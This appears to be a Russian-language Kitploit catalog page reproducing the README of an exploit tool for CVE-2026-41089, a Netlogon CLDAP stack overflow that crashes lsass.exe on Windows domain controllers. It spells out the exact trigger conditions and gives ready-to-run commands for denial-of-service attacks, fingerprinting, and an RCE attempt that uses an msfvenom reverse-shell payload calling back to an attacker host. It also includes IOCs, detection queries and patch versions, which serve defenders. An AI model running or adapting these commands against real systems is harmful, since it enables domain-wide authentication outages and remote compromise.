Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-41089 — CVE-2026-41089 - это критическая уязвимость удаленного выполнения кода в службе Netlogon Windows, один пакет может привести к сбою lsass.exe, что вызовет перезагрузку контроллера домена примерно через 30-60 секунд. В течение этого времени вся доменная аутентификация на этом контроллере домена будет неудачной. | Kitploit
Инструменты/GitHubGitHub/hnytgl/cve-2026-41089
Анализ уязвимостейЭксплуатацияТестирование на ПроникновениеИнструмент Удаленного ДоступаЭксплуатация Бинарных Файлов
GitHubhnytgl/cve-2026-41089

CVE-2026-41089

Репозиторий
1412142 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

CVE-2026-41089 - это критическая уязвимость удаленного выполнения кода в службе Netlogon Windows, один пакет может привести к сбою lsass.exe, что вызовет перезагрузку контроллера домена примерно через 30-60 секунд. В течение этого времени вся доменная аутентификация на этом контроллере домена будет неудачной.

Поделиться

CVE-2026-41089 — Эксплойт RCE через переполнение стека в CLDAP Netlogon для Windows

CVE-ID: CVE-2026-41089
CVSS: 9.8 (Критический)
CWE: CWE-121 (Стековое переполнение буфера)
Вектор атаки: UDP/389 (CLDAP SearchRequest)
Воздействие: Удалённое выполнение кода (RCE) / Отказ в обслуживании (DoS)
Затронутые версии: Windows Server 2012 R2 ~ 2025 (контроллеры домена)
Патч: Кумулятивное обновление мая 2026 года

Обзор уязвимости

Функция NetpLogonPutUnicodeString в netlogon.dll содержит уязвимость переполнения стека при обработке запросов поиска CLDAP. Функция получает бюджет длины в байтах, но интерпретирует его как количество WCHAR, что приводит к записи в 2 раза больше ожидаемого.

Переполнение происходит в фиксированном стековом буфере размером 528 байт (264 ushort) функции NlGetLocalPingResponse. Управляемое атакующим поле User вместе с собственным DNS-именем сервера заполняют этот буфер, в конечном итоге перезаписывая GS-куки, что вызывает и аварию .

__report_gsfailure
lsass.exe

Условия срабатывания

  • В CLDAP SearchRequest NtVer=0x02 (принудительное использование старого, уязвимого пути BuildSamLogonResponse)
  • Длина поля User ≥ ~130 символов (бинарный лимит ~260 байт UTF-16)
  • Длина DNS-имени сервера ≥ ~80 символов (чем длиннее домен, тем легче достичь куки)

Внимание: NtVer=0x16 (значение, используемое многими публичными скриптами обнаружения) активирует безопасный путь BuildSamLogonResponseEx, не вызывающий уязвимость.

Функции

РежимОписание
--mode dosОтправляет специально сформированный пакет CLDAP, вызывающий аварию LSASS и перезагрузку DC (~60 секунд прерывания аутентификации)
--mode rceПопытка удалённого выполнения кода (исследовательский уровень, требуется shellcode)
--mode scanСканирование ответов с разными значениями NtVer, снятие отпечатков целевого DC
--mode autoАвтоматическое обнаружение и выбор наилучшей стратегии атаки

Режим DoS

Один пакет приводит к аварии lsass.exe, из-за чего контроллер домена перезагружается в течение ~30-60 секунд. В течение этого времени вся доменная аутентификация через данный DC будет невозможна.

root@kitploit:~
# Базовое использование — отправка 3 пакетов
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode dos

# Быстрая атака одним пакетом
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 1

# Агрессивный режим — 5 одновременных пакетов
python CVE-2026-41089-exp.py dc01.corp.local corp.local --mode dos --count 5 --delay 0.1

Режим RCE

⚠️ Исследовательский уровень — ненадёжен и нестабилен в реальных условиях.

Проблемы RCE:

  1. Данные переполнения — это собственное DNS-имя сервера, а не shellcode атакующего
  2. GS Cookie необходимо обойти (требуется примитив утечки информации или брутфорс)
  3. CET/ACG/CFG на Server 2022+ усложняют традиционный ROP
root@kitploit:~
# Генерация shellcode
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=4444 \
         -f raw -o shellcode.bin

# Отправка цепочки RCE
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode rce \
    --shellcode-file shellcode.bin --lhost 10.0.0.5 --lport 4444

Режим сканирования

root@kitploit:~
# Снятие отпечатков целевого DC
python CVE-2026-41089-exp.py 10.0.0.10 corp.local --mode scan

Пример ожидаемого вывода (запатченная цель):

root@kitploit:~
NtVer=0x00000002 → RESPONDED (3 ms)
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Пример ожидаемого вывода (незапатченная цель):

root@kitploit:~
NtVer=0x00000002 → TIMEOUT (5001 ms)    ← LSASS crashed!
NtVer=0x00000004 → RESPONDED (4 ms)
NtVer=0x00000006 → RESPONDED (3 ms)
NtVer=0x00000016 → RESPONDED (3 ms)
NtVer=0x00000000 → RESPONDED (3 ms)

Если NtVer=0x02 даёт таймаут, а остальные версии отвечают нормально, то цель, скорее всего, уязвима.

Расширенные параметры

ПараметрОписаниеЗначение по умолчанию
-l, --user-lenДлина поля имени пользователя (количество ASCII символов)180
--ntverЗначение NtVer (шестнадцатеричное, напр. 0x02)0x02
--countКоличество отправляемых DoS-пакетов3
--delayЗадержка между пакетами (сек)0.5
-t, --timeoutТаймаут сокета (сек)5.0
--jsonВывод результатов в формате JSON—
--rawПечать сырого дампа пакета перед отправкой—
--quietПодавление вывода баннера—
--shellcode-fileФайл пользовательского shellcode (сырой x64)—
--lhostАдрес для обратного шелла—
--lportПорт для обратного шелла4444

Настройка тестовой среды

root@kitploit:~
# Создание DC с длинным доменом на Windows Server (незапатченном):
# 1. Повышение до контроллера домена (имя DNS с очень длинным доменом, например "this-is-a-very-long-domain-name-for-testing.corp.local")
# 2. Убедитесь, что установлен патч до мая 2026 года.
# 3. Запустите из атакующей машины:
python CVE-2026-41089-exp.py <DC_IP> <LONG_DOMAIN_NAME> --mode dos --count 1
# 4. Наблюдайте аварию и перезагрузку DC

Индикаторы компрометации (IOCs)

Сеть

  • CLDAP SearchRequest на UDP/389 с User > 100 байт и NtVer = 0x02
  • Аномальный CLDAP-трафик от узла, не являющегося контроллером домена, к DC

Хост

root@kitploit:~
Event ID: 1000
Faulting process: lsass.exe
Faulting module: netlogon.dll
Exception code: 0xc0000409 (STATUS_STACK_BUFFER_OVERRUN)

Правила обнаружения

root@kitploit:~
index=wineventlog source="WinEventLog:Application" EventID=1000
  Process_Name="lsass.exe" Exception_Code="0xc0000409"
root@kitploit:~
Event
| where Source == "Application" and EventID == 1000
| where RenderedDescription contains "lsass.exe"
| where RenderedDescription contains "0xc0000409"

Информация о патче

Версия Windows ServerНомер патчаПримечания
Server 20126.2.9200.26079ESU
Server 2012 R26.3.9600.23181ESU
Server 201610.0.14393.9140
Server 201910.0.17763.8755
Server 202210.0.20348.5074
Server 2022 23H210.0.25398.2330
Server 202510.0.26100.32772

Юридическое заявление

Данный инструмент предназначен только для авторизованной оценки безопасности, пен-теста, соревнований CTF и оборонительных исследований. Использование в любой системе без явного письменного разрешения является незаконным. Ответственность за любые последствия несёт пользователь.

Ссылки

  • Microsoft Security Update Guide: CVE-2026-41089
  • NVD: CVE-2026-41089
  • Kudelski Security Research — Netlogon Stack Buffer Overflow Analysis
  • SecPod Analysis — IOCs and Detection
  • IONIX Threat Center — CVE-2026-41089
Скачать инструмент